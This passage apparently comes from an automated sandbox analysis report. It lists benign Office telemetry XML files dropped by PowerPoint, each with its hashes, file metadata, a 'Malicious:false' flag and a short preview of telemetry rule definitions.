                                                                                                                              SHA-512:A6E6E0A06FC2393830545B7AE49A751DD7A9783FD6CE3BFE5769407098500085A8E4A1AC9BC2BBFDB2DE8330AFEBAABA23C947C7A98674827762622B8A34F746
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140255" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.UndoRedo.TransactionMultiDocUndo" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c6k58" />.. </S>.. <C T="U32" I="0" O="false" N="MultiDocUndoOtherDocsCount">.. <S T="1" F="cOtherDocs" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1900
                                                                                                                              Entropy (8bit):4.54858487637551
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dRLTN+rVrilNWriVwU7P4PHcm6cpd0LKexuP4PQxnzxkOxR1uWjPXOsPqOdpg:c5ToxoYuV3EXWZe19fuWbwMpg
                                                                                                                              MD5:2B5AFF9F77447D879D4953D05AF1D9A3
                                                                                                                              SHA1:C69A332340C2F6C7C12470E5360FD4055BD49539
                                                                                                                              SHA-256:8EA5587E9EDCEFE8D84761DB3EA572F1775E05D838792F8A34E8252B2415EEA5
                                                                                                                              SHA-512:1B995E94A14EEF6451F876BE4395E608B9152C695573248838AC362E4709C2C49BCC5E18C7FCA3692AA2F71F7FC75CBDB295386FF66F1F8DFF39A192B8871BD9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140259" V="0" DC="SM" EN="Office.PowerPoint.ModernCommentMerge.TextAnchorInvalidation" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c8i3u" />.. <UTS T="2" Id="c8i3h" />.. <UTS T="3" Id="9x6y0" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="U32" I="0" O="true" N="TextbodyLength">.. <O T="COALESCE">.. <L>.. <O T="COALESCE">.. <L>.. <S T="3" F="TextBody Length" />.. </L>.. <R>.. <S T="2" F="TextBody Length" />.. </R>.. </O>.. </L>.. <R>.. <S T="3" F="Context TextBody Length" />.. </R>.. </O>.. </C>.. <C T="U32" I="1" O="true" N="BodyMismatchCharPos">.. <S T="3" F="TextRange CharPos" />.. </C>.. <C T="U32" I="2" O="true" N="BodyMismatchTextRangeLength">.. <S T="3" F="TextRange Len
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3030
                                                                                                                              Entropy (8bit):4.967517664272118
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dDuJtrwCkOWNx3eAI8A1Pw5vOy5jvEQHWJNe+Y0P2LNAqyUqGGBerCltB8I0bI4:ceTHWN9SEeJCU2LuCFVClt1fZ9k
                                                                                                                              MD5:63B5AB2CBEFBA7566F1684B2359F39AC
                                                                                                                              SHA1:8429BF4194DE01076D4334CEEB3CEBDBF96B87F1
                                                                                                                              SHA-256:2CC3CA0298E37287133694988BA1A959345AB71998167FE36C7F589350371C77
                                                                                                                              SHA-512:ACEB4194F75887CBA681D4018CD49A20430374B209690CCD6D7816A1222504CE18DE45491F4166B014196FB21B36EDE53D06FB1E2FF6E6A89AD3623708AB367F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140460" V="5" DC="SM" EN="Office.PowerPoint.PPT.Shared.AugLoop.RuntimePerformance" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cnmkt" />.. </S>.. <C T="W" I="0" O="true" N="DocGuid">.. <S T="1" F="docGuid" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="OutputSchemaName">.. <S T="1" F="outputSchemaName" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="ResponseCount">.. <V V="1" T="U32" />.. </C>.. <C T="U64" I="3" O="false" N="OutputTileSize">.. <S T="1" F="outputTileSize" />.. </C>.. <C T="U64" I="4" O="false" N="RequestResponseDurationMsec">.. <S T="1" F="requestResponseDurationMsec" />.. </C>.. <C T="U64" I="5" O="true" N="InputTileSize">.. <S T="1" F="inputTileSize" M="Ignore" />.. </C>.. <C T="U64" I="6" O="true" N="ReqOrd">.. <S T="1" F="reqOrd" M="Ignore" />.. </C>.. <C T="U32" I="7" O="true" N="S
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):982
                                                                                                                              Entropy (8bit):4.870980703158486
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdP6cfXwm1/GbSerSOerterpferBajELvnEwdXHaSMxwPWaXHhSMpOwyKnXHIA:2dPj10Frgr4r8rcgLmaYKnCbFU
                                                                                                                              MD5:3270CA8B0C0608F0D718008D05C6E501
                                                                                                                              SHA1:28C33D2A9175521E45DC2BAAC236C3A26031F099
                                                                                                                              SHA-256:EC21D64752FAFB1E6FB7C425FA6962CA0542FFEAFB88B6A60130A3421BAE9AC5
                                                                                                                              SHA-512:745D45CCEE5239BF51155D4A477AB4149B487AEAC052CC7301A511EABA7BDF1A85037B7F0AA02ECCA33522B81DB267CBC1BEDB450C9B32BC02EB767E0A831BC3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140461" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.AugLoop.EditorUPP" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cthbh" />.. <UTS T="2" Id="cthbi" />.. <UTS T="3" Id="cthbj" />.. <UTS T="4" Id="cthbk" />.. <A T="5" E="TelemetrySuspend" />.. <A T="6" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="EditorUPPOpenCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="EditorUPPDismissCount">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="EditorUPPAcceptCount">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="U32" I="3" O="false" N="EditorUPPNotNowCount">.. <C>.. <S T="4" />.. </C>.. </C>.. <T>.. <S T="5" />.. <S T="6" />.. </T>.. <ST>.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):902
                                                                                                                              Entropy (8bit):4.999012752783924
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdfzcc5m5/Gb2erANcL7QjEBzD+eXsM9dTsGXMxjuGXNO5AdHNUlu:2dfz5sIJrWOZzej7
                                                                                                                              MD5:DB0EA7E790324EF544F97258D5383D1E
                                                                                                                              SHA1:19531BFE0BBE6194EA235C9C06815112B10B7623
                                                                                                                              SHA-256:8AE367D5E09053E788056CD510570DEEADB9B41859278268ECA3D08C0CBFC039
                                                                                                                              SHA-512:0C89F6A77E3ED8D7DB3B07DA03CF3F78BE4C5B361E1AA2ABBA112AA53A544BCA5A6C7F644D67EE25F19485997C76E928763721A34C5F31941B9E03281CAE1440
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140479" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.LiveSubtitles.AudioSerializationPerf" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="cyury" />.. <TI T="2" I="5min" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="SessionId" />.. </S>.. </G>.. <C T="W" I="0" O="true" N="SpeechSessionId">.. <S T="1" F="SessionId" />.. </C>.. <C T="U64" I="1" O="false" N="AvgDurationInMs">.. <A T="AVG">.. <S T="1" F="DurationInMs" />.. </A>.. </C>.. <C T="U64" I="2" O="false" N="MaxDurationInMs">.. <A T="MAX">.. <S T="1" F="DurationInMs" />.. </A>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1115
                                                                                                                              Entropy (8bit):4.917802340431483
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdp1c5mx/GbjWnerdcL7QjEBzD+eXsM9dTsGXMxjuGXRkzHaSM4xWOXAWNYVKs:2dpWsgtrrOZzeyNQ37
                                                                                                                              MD5:305D89BFEFE670B63263C7D60D02E9E0
                                                                                                                              SHA1:A2E8B984CFE98F619B9F7EEB69C38DB5FF2D0500
                                                                                                                              SHA-256:35D471CF73C8A7FAB0A2879AE3C1E21A9775C4856A212A0AFEF33FD311858320
                                                                                                                              SHA-512:7674A72A5481D1C075865AA6456D933B07EB176CCCEC1B6AD9D9C4A64ADCE4D781ADAB3ED926A7A2AFA562755EC3EE986A234071C6298B858D1B0A4D8CB8993B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140480" V="2" DC="SM" EN="Office.PowerPoint.PPT.Shared.LiveSubtitles.AudioSentPerf" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cyurz" />.. <TI T="2" I="5min" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="SessionId" />.. </S>.. </G>.. <C T="W" I="0" O="true" N="SpeechSessionId">.. <S T="1" F="SessionId" />.. </C>.. <C T="U64" I="1" O="false" N="AvgDurationInMs">.. <A T="AVG">.. <S T="1" F="DurationInMs" />.. </A>.. </C>.. <C T="U64" I="2" O="false" N="MaxDurationInMs">.. <A T="MAX">.. <S T="1" F="DurationInMs" />.. </A>.. </C>.. <C T="U32" I="3" O="false" N="CountAudioSent">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U64" I="4" O="true" N="SumAudioSizeInBytes">.. <A T="SUM">.. <S T="1" F="AudioSize" />.. </A>.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):906
                                                                                                                              Entropy (8bit):5.0029286235310435
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdaxUc57/Gb2ergcL7QjEBzD+eXsM9dTsGXMxjuGXNO5AdHNUlu:2deEJrkOZzej7
                                                                                                                              MD5:21F5B9909AEFCA4ABE23F2FC333A4071
                                                                                                                              SHA1:0A74DD41E8B00D5176A61CC6372775A3CE8C80D0
                                                                                                                              SHA-256:28133DE9F398DA7DD566657B5C75C51960EC380AE66AE70C8F87D16F60495CCE
                                                                                                                              SHA-512:0780412045CFF88318C0EBDC38AB86B7C21009C82FA64B2B14C856143AFF0D037FE02E9339AA1DFE58684F54DDC6AC5EB0E1B5D9D6EF0F4C4064F175FC2E0649
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140481" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.LiveSubtitles.CaptionDeserializationPerf" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="cyurw" />.. <TI T="2" I="5min" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="SessionId" />.. </S>.. </G>.. <C T="W" I="0" O="true" N="SpeechSessionId">.. <S T="1" F="SessionId" />.. </C>.. <C T="U64" I="1" O="false" N="AvgDurationInMs">.. <A T="AVG">.. <S T="1" F="DurationInMs" />.. </A>.. </C>.. <C T="U64" I="2" O="false" N="MaxDurationInMs">.. <A T="MAX">.. <S T="1" F="DurationInMs" />.. </A>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1005
                                                                                                                              Entropy (8bit):4.961246295439378
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5c5MH8/GbjWnervcL7QjEBzD+eXsM9dTsGXMxjuGXRz337HaSMNO5AdHNUlu:2dCO3trZOZzeBG7
                                                                                                                              MD5:A99AAA9B8A0F53E503E187AEC1BCDB33
                                                                                                                              SHA1:185CE6E6929FB8E45AD79DDCC2225F9E28886299
                                                                                                                              SHA-256:B2AC82D2775B278CD1A6CBBDC91257EFEDDD3D1223D04742197DCB485DE4F82B
                                                                                                                              SHA-512:EE27F0828A810803C9A40FA357AD489C0CD79A47201EC0DB506A175B8B67E00448EC6BD29A0E2BF99304C2FC49AC8BF54AAE1E915D3E0F8AE49850ABB404EDB6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140482" V="2" DC="SM" EN="Office.PowerPoint.PPT.Shared.LiveSubtitles.CaptionReceivedPerf" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cyurx" />.. <TI T="2" I="5min" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="SessionId" />.. </S>.. </G>.. <C T="W" I="0" O="true" N="SpeechSessionId">.. <S T="1" F="SessionId" />.. </C>.. <C T="U64" I="1" O="false" N="AvgDurationInMs">.. <A T="AVG">.. <S T="1" F="DurationInMs" />.. </A>.. </C>.. <C T="U64" I="2" O="false" N="MaxDurationInMs">.. <A T="MAX">.. <S T="1" F="DurationInMs" />.. </A>.. </C>.. <C T="U32" I="3" O="false" N="CountCaptionReceived">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>.. <ST>.. <S T="1" />.. </ST>..<
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):611
                                                                                                                              Entropy (8bit):5.171913036821227
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd2c5yS/Gb2erPSsM9dOq6ntoGUqhGYNO2su:2dnANJrazf0f
                                                                                                                              MD5:8AF9EE876D8DD1EFF68695D2354F68C3
                                                                                                                              SHA1:889DD94812BC46FA87FAD230CFBC9583816DFFED
                                                                                                                              SHA-256:E0C80D7D0271F0C119A8440FAE758D458A0AAEE54F096F4712CBEB13218468D7
                                                                                                                              SHA-512:ADB4811F2B00C6C2ECED65F15FBAAC894732F180FBD1783AB7723E94BD1BE43CEAA419DC3367E6EE05904556FF954982DBEE301F9B5DEA69DC1D96CD17375DCA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140483" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.LiveSubtitles.FrontDoorReconnect" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="czhh6" />.. </S>.. <C T="W" I="0" O="true" N="SpeechSessionId">.. <S T="1" F="SessionId" />.. </C>.. <C T="I32" I="1" O="false" N="ReconnectAttempts">.. <S T="1" F="ReconnectAttempts" />.. </C>.. <C T="B" I="2" O="false" N="ReconnectSuccess">.. <S T="1" F="ReconnectSuccess" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):612
                                                                                                                              Entropy (8bit):5.173053121823797
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdtLc5a/Gb2erOAsM9ddLw99dy9ZMjNO2su:2dGDJrOAzp0Z7J
                                                                                                                              MD5:98BCDE5152B8A5FF17E41061474B4753
                                                                                                                              SHA1:05868CB2A7B8FD73746767F92210C8CA721AB815
                                                                                                                              SHA-256:6E4F5D325EEA1CE7BC274260D621594CCF46588EBBAC5BEE31C6A3ED40EBA6A1
                                                                                                                              SHA-512:D10C7C274A1BD5169821C8C1738DDFD12949686A70124F4C80C48A3653A572B730B1DAD89A141EEE2AA6D59DEB40D7C5B8D91CAA054CA71D421403B772981434
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140484" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.LiveSubtitles.FrontDoorErrorCodes" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="czmo9" />.. </S>.. <C T="W" I="0" O="true" N="SpeechSessionId">.. <S T="1" F="SessionId" />.. </C>.. <C T="W" I="1" O="true" N="TranscriptErrorCode">.. <S T="1" F="TranscriptErrorCode" />.. </C>.. <C T="W" I="2" O="true" N="MessageErrorCode">.. <S T="1" F="MessageErrorCode" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):524
                                                                                                                              Entropy (8bit):5.264387267241579
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdmJxc5h3fv/GbSerqsS8NQrdLR3pbOXWNO2su:2dmJaaFrqtJDQm
                                                                                                                              MD5:074779E2D6606B6FAE013BDDB4CEFAD2
                                                                                                                              SHA1:1B37C143FF18C1FB26A4F60AEEEE411A2E4FD035
                                                                                                                              SHA-256:11CAFE68572CC48A4E5133528778DD98AFC3C88C96258EC883A3DCC9E851D38B
                                                                                                                              SHA-512:46B45976DD6C5261A1FEAEFEA076CBB4A05CDAE8CEACB9E4B10DE99C696D36B25209C2CF6F3A74B4E8F72801B7160508DD959F961E689200D822C4DF5E3ABFEC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140485" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.LiveSubtitles.DocumentAndSpokenLanguage" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cy57o" />.. </S>.. <C T="W" I="0" O="true" N="DocumentLanguage">.. <S T="1" F="Document Language" />.. </C>.. <C T="W" I="1" O="true" N="SpokenLanguage">.. <S T="1" F="Current Spoken Language" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):336
                                                                                                                              Entropy (8bit):5.373780524995946
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7Dkz9Q3zENzAZte/GbOSIxSpRMFpAQ/CCHperheHneOn2sby:TMHdV3zYn/GbaAQjer+neO2su
                                                                                                                              MD5:F6646D18B045A574C7BEA68539DDF335
                                                                                                                              SHA1:0C6A56430A6D7A3712FF0CD9C211104AE940812B
                                                                                                                              SHA-256:4F66872467193ECC9EE5424DE592CA94FAE32CDC1A5F53B3F15BF74FF90C0972
                                                                                                                              SHA-512:D52B09B8E736B7E06B77B060989E7CF184B8A401ECE5DF8AF62F9D862570D36D4EDE3E2691CD5E399DF727F483B659F028871A5C19F9CABB317267F411255A87
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140496" V="1" DC="SM" EN="Office.PowerPoint.Rehearsal.RehearseAgain" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="8vwot" />.. </S>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):662
                                                                                                                              Entropy (8bit):5.057773214766845
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdfr2LqIVHg/GbaAQierxerHtSNah6s1S7PNWcQf/0//XFhmMNOcsu:2dwnVLircr0He6PoO
                                                                                                                              MD5:11089361AF93FBD59A11C68162EF04DD
                                                                                                                              SHA1:7FAEC53E529BD79D064CF31C34C4C0E1B43A55DC
                                                                                                                              SHA-256:E8BA56432E0204B27802CD7F743263B8586B5A0981CCA7E3BFADF1A56F6E2730
                                                                                                                              SHA-512:52EEEDB75ACB39B2FDBE44018F15173D758BBDC263EF5AF3E107BD08B3BB6207D59DCF01AD3D41052A192247FBCDBCCAC37E88769D54330FB461895B68D172C1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="142305" V="2" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Content.OnlineMoviePlaybackStop" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cnmkp" />.. <UTS T="2" Id="c5z9q" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="W" I="0" O="true" N="URLHash">.. <O T="COALESCE">.. <L>.. <S T="1" F="StopMovie" M="Ignore" />.. </L>.. <R>.. <S T="2" F="StopVideo" M="Ignore" />.. </R>.. </O>.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):966
                                                                                                                              Entropy (8bit):4.997027031007727
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdkEr2Lqv8v/GbaAQ4Wner4NerHLSNah6s1S7PNW1f/0//ThmM8ZqNEEdy9Egh:2dk/+RrBrOHe6PiBfIcARAfLWo
                                                                                                                              MD5:AD826E61F971A29DF70DCAA610870EC7
                                                                                                                              SHA1:17159E8FE1F8F636CABAD40279671D1A54CF1B0A
                                                                                                                              SHA-256:A9DE7C57D69A1EDDD476AE8481C56F36D0B69CA4D7566C3C42DA48CDD729F7CD
                                                                                                                              SHA-512:EAD841355C900816860E15B17B7EBFE3ADBD582023999EE16BD66296186CDB22E976A73ADF4FE6179E000C09EED805C653CDA6DDDA1FE5931C7950BF76BABC25
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="142314" V="2" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Content.OnlineMoviePlay" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cnmko" />.. <UTS T="2" Id="c5z9o" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="W" I="0" O="true" N="URLHash">.. <O T="COALESCE">.. <L>.. <S T="1" F="PlayMovie" M="Ignore" />.. </L>.. <R>.. <S T="2" F="PlayVideo" M="Ignore" />.. </R>.. </O>.. </C>.. <C T="D" I="1" O="true" N="DurationSeconds">.. <S T="3" F="DurationSeconds" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="ProviderName">.. <S T="3" F="ProviderName" M="Ignore" />.. </C>.. <C T="I64" I="3" O="true" N="CommandDuration">.. <S T="3" F="CommandDuration" M="Ignore" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):645
                                                                                                                              Entropy (8bit):5.187220234148482
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHduUr2LqX//GbaAQ4WnermdOerHZSNahlg/OadL1SZnNOcsu:2dwbRrYroTWKxof
                                                                                                                              MD5:30C63A60D5598EF8B4E502840BDD4155
                                                                                                                              SHA1:DA936E0E70BFA2940539C8DA92672C37B9F7BDED
                                                                                                                              SHA-256:6FBB0A7CABBEC09E0421A8CBCD21AB02BF03311E38CBBD9D2662291C8E6FDF2E
                                                                                                                              SHA-512:9580AF54C39C5A4E53423131873F1D7D2EED037A65DF4458E60CC5459D3E7F4F3D7C800FC07A27A19B8DC4AFBA5B8D1CB0D7211C9173CD733D2857CA4367E789
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="142321" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Content.OnlineMovieLoadWebView" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="c5z9t" />.. <UTS T="2" Id="c5z9m" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="I64" I="0" O="true" N="CommandDuration">.. <S T="3" F="CommandDuration" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="URLHash">.. <S T="3" F="LoadWebView" M="Ignore" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):667
                                                                                                                              Entropy (8bit):5.173978463456477
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdubr2LqmvYBj/GbaAQ4WnermBerHySNahlg/OadL1SBBvNOcsu:2dTdYBKRr7r1TWKx0BX
                                                                                                                              MD5:77E21269C66722D87D2D2313018DD0C9
                                                                                                                              SHA1:3BCDAF1D637CE6DED43C7C7EFACFA6EE277DDF1F
                                                                                                                              SHA-256:0DFDED70587CAC931567C6568E373E9F113C934646E1E56ED8AB107225742995
                                                                                                                              SHA-512:BFE6B63E078DC0935AC7F586DC7AB8F4A20BE496BF66959037ADAD29CC3C356FBE54C22C6FD8B5F29E6DF0142515EA6A1F8262CD1FE21F164097DB6C990DA11F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="142322" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Content.OnlineMovieGenerateStreamSSOToken" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="c5z9u" />.. <UTS T="2" Id="c5z9n" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="I64" I="0" O="true" N="CommandDuration">.. <S T="3" F="CommandDuration" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="URLHash">.. <S T="3" F="GenerateStreamSSOToken" M="Ignore" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):665
